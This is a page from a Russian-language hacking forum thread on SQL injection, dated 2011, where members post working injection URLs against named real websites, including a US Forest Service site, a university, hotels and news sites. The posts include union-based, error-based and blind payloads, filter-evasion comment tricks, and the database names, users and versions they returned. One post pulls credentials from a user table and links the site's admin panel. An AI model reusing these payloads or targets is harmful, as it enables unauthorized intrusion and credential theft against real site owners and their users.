HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1421 из 1604 « Первая < 421921132113711411 1417 1418 1419 1420 1421 1422 1423 1424 1425 143114711521 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14201  
Старый 21.08.2011, 23:18
MyGreenLife
Новичок
Регистрация: 27.11.2009
Сообщений: 2
Провел на форуме:
15442

Репутация: 0
По умолчанию
Странно, но пробелы и плюсы у меня упорно нехотели работать ... решил проблему тунсами, можно заменить на плюсы...

Цитата:
Сообщение от None  
http://konditerprom.ru/list/list.php?cid=1)/**/%26%26/*tuns*/(1)like(2)/*tuns*//*!union+select*//*tuns*/1,2,concat(0x3a,version(),0x3a,user(),0x3a,databas e(),0x3a,@@datadir,0x3a,@@basedir,0x3a,@@tmpdir,0x 3a,@@version_compile_os),4,5,6,7,8,9,10--%0d
Цитата:
Сообщение от None  
http://konditerprom.ru/list/list.php?cid=-1)/*tuns*/union/*tuns*/select/*tuns*/1,group_concat(column_name),3,4,5,6,7,8,9,10/*tuns*/from/*tuns*/information_schema.columns/*tuns*/where/*tuns*/table_name=0x7573657273--%0d
 
Ответить с цитированием

  #14202  
Старый 22.08.2011, 10:48
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию
тИЦ 80, PR 4, ЯК, DMOZ

Выводится между [COLOR="yellow"]=>

Код HTML:
HTML:
http://www.hotels-in.ru/hotel.php?hid=999999.9+union+all+select+concat(0x3d3e,unhex(Hex(cast(database()+as+char))),0x3c3d)--
тИЦ 10, PR 2

Код HTML:
HTML:
http://aquatics.ru/accessory.php?aid=999999.9+union+all+select+1,concat(0x3a29203d3e,unhex(Hex(cast(database()+as+char))),0x3c3d20283a),NULL,NULL,NULL,NULL,NULL,NULL--
EASYHOMEPOKER

Мб что-нибудь найдете

Код HTML:
HTML:
http://easyhomepoker.com/player.php?id=999999.9+union+all+select+1,2,concat(0x3d3e,database(),0x3c3d),NULL,NULL,NULL,NULL--
 
Ответить с цитированием

  #14203  
Старый 22.08.2011, 15:06
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию
Код:
Code:
http://shrs.iupui.edu/about/profile.php?emp_id=-22+union+select+1,concat(database(),char(59),version(),char(59),
user())+--+
VERSION : 5.0.83

DATABASE : shrsweb

USER : root@lux2.uits.indiana.edu

PR - 5
 
Ответить с цитированием

  #14204  
Старый 22.08.2011, 15:49
Sloommm
Guest
Сообщений: n/a
Провел на форуме:
276

Репутация: 5
По умолчанию
Target: http://www.championsseriestennis.com/player.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,c oncat_ws(0x3a,id,username,password

Host IP: 184.168.136.128

Web Server: Apache

DB Server: MySQL

Resp. Time(avg): 867 ms

Current User: gcaparulo2@184.168.193.186

Sql Version: 5.0.91-log

Current DB: gcaparulo2

System User: gcaparulo2@184.168.193.186

Host Name: p3nlhdb5007-07.shr.prod.phx3.secureserver.net

Installation dir: /usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/

DB User: 'gcaparulo2'@'%'

Data Bases: information_schema

gcaparulo2

PR-5
 
Ответить с цитированием

  #14205  
Старый 22.08.2011, 20:38
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.al-mawrid.org/pages/research_detail.php?research_id=-5+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4+--+[/COLOR][/COLOR] 
VERSION : 5.1.55

DATABASE : almaw0_mawrid

USER : almaw0_naveed@localhost

PR - 5

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.fpl.fs.fed.us/research/highlights/view_research_highlight.php?research_id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(59),version(),char(59),user()),10,11,12,13,14,15+--+[/COLOR][/COLOR] 
VERSION : 5.0.51a-3ubuntu5.5

DATABASE : forestproductslaboratorydb

USER : root@localhost

PR - 6
 
Ответить с цитированием

  #14206  
Старый 22.08.2011, 20:45
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию
Код:
Code:
http://kinogallery.com/news/comments.php?id=9641 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: kinogaller_kino@localhost

Version: 5.0.51a-community

Database: kinogaller_kino1

PR 4

тИЦ 140
 
Ответить с цитированием

  #14207  
Старый 23.08.2011, 23:38
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию
Код:
Code:
http://club-edu.tambov.ru/main/methodic/index.php?id=40' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: club@localhost

Version: 5.1.30-log

Database: club_methodic1

PR 5

тИЦ 2900

Код:
Code:
http://www.desertmuseum.org/center/edu/pp_showclass.php?id=1580 and 1=1
[blind]

User: webasdm@69.9.3.67

Version: 4.0.18-log

Database: asdmdata

PR 6

тИЦ 20

Код:
Code:
http://www.manli.com/products/details.php?id=113.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
User: manlico_web@localhost

Version: 5.0.92-community

Database: manlico_web

PR 4

тИЦ 130
 
Ответить с цитированием

  #14208  
Старый 24.08.2011, 20:13
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
Акция: Интернет без гов*а

http://www.webhostingcanada.com/faq/question.php?mode=read&question=-14+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13 ,14,15--+
 
Ответить с цитированием

  #14209  
Старый 25.08.2011, 18:22
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию
labocadellobo.es PR-5

Код:
Code:
http://www.labocadellobo.es/laboca/ficha.php?menu_id=1&jera_id=14&page_id=-75+/*!UnIoN*/+/*!SEleCT*/+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17+--+
Код:
Code:
5.0.77:Boca2007@localhost:Boca2007
www.fam.ulusiada.pt PR-6 blind

Код:
Code:
http://www.fam.ulusiada.pt/noticias/artigo.php?news_id=1217'+and+5=substring((select+version()),1,1)+--+
(нет редиректа)

theatreinchicago.com PR-5

Код:
Code:
http://www.theatreinchicago.com/newswire.php?newsID=-215+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
Код:
Code:
4.0.27-standard:dbo141597383@localhost:db141597383
 
Ответить с цитированием

  #14210  
Старый 25.08.2011, 23:26
MyGreenLife
Новичок
Регистрация: 27.11.2009
Сообщений: 2
Провел на форуме:
15442

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://autodaynews.ru/cat.php?cid=1+or(1,1)=(select+count(*),concat_ws(0 x3a,(select+concat(user,0x3a,pass)+from+userlist+l imit+0,1),floor(rand()*2))+from+information_schema .tables+group+by+2+limit+1,1)--+
Админка - http://autodaynews.ru/admin/
 
Ответить с цитированием
Ответ
Страница 1421 из 1604 « Первая < 421921132113711411 1417 1418 1419 1420 1421 1422 1423 1424 1425 143114711521 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ